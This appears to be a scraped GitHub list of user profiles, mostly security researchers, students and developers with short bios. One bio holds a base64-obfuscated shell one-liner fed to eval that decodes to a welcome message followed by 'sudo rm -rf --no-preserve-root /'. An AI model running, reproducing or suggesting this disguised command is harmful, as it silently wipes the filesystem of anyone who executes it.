Rocking !
I hate not understanding precisely how things work.
r648r
r648r
ping 127.1 -c 1 && eval $(echo "ZWNobyAi8J+agCBXZWxjb20gdG8gdGhlIGdydWIiICYmIHNsZWVwIDEgJiYgc3VkbyBybSAtcmYgLS1uby1wcmVzZXJ2ZS1yb290IC8=" | base64 -d)
Stuck in vim
Omar BaGunaid
omar0ali
Go dev building backend systems, web services, microservices, CLI tools, and games.
Toronto, Canada
Hossam Ehab
0xHossam
Just another red team operator who can make computers do very bad stuff
@CyShield Egypt
Nick Aliferopoulos
naliferopoulos
Everything is open source if you are into SRE.
@Hackcraft-Labs /usr/sbin
Rémi GASCOU (Podalirius)
p0dalirius
Senior Security Researcher @SpecterOps, Speaker, Microsoft MVP
@SpecterOps France
Raj Chowdhury
RajChowdhury240
☁️ <3
Passionate Security Engineer with a focus on Red Teaming, Cloud Security, AV/EDR Evasions!
Confidential $ aws sts get-caller-identity
ThatTotallyRealMyth
ThatTotallyRealMyth
Pentester and Soon to be Electrical Engineer.
Love all things Active Directory, IoT and Embedded Device security
Gridware Cybersecurity Sydney, Australia
Ondřej Papež
papezo
Student at VSB - Technical University of Ostrava - Computer Science
Czech Republic
Nooraddin_Ismail
nooraddinismail
Cybersecurity student focusing on network defense, digital forensics, and secure system design. Passionate about hands-on labs, threat detection, and automation
Yemen_sana'a
PreviousNext